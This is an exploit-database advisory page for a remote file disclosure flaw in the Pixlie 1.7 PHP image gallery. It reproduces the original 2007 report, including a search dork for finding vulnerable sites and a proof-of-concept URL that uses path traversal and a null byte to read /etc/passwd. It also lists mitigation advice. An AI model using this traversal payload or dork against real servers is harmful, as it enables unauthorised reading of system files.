header-logo
Suggest Exploit
vendor:
Pixlie
by:
Rizgar
7.5
CVSS
HIGH
Remote File Disclosure
CWE
Product Name: Pixlie
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Pixlie 1.7 Remote File Disclosure Vulnerability

The Pixlie 1.7 script is vulnerable to remote file disclosure. By manipulating the 'root' parameter in the 'pixlie.php' file, an attacker can disclose sensitive information such as the '/etc/passwd' file on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to apply a patch provided by the vendor or upgrade to a newer version of the Pixlie script. It is also advised to restrict access to sensitive files and directories on the server.
Source

Exploit-DB raw data:

Pixlie 1.7 Remote File Disclosure Vulnerability
-----------------------------------------------------------------------

Script : Pixlie 1.7

Version : 1.7

Site : http://www.pixlie.de/download.php

Founder : Rizgar

Contact : rizgar@linuxmail.org and irc.gigachat.net #kurdhack

Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys)

d0rk : "Pixlie - die kostenlose Bildergalerie"

-----------------------------------------------------------------------

look at pixlie.php


//$root = "/home/www/IhrBenutzer/html";



PoC :

http://www.example.com/pixlie.php?root=../../../../../etc/passwd%00

# milw0rm.com [2007-08-10]

Navigation

Suggest Exploit

Services By CQR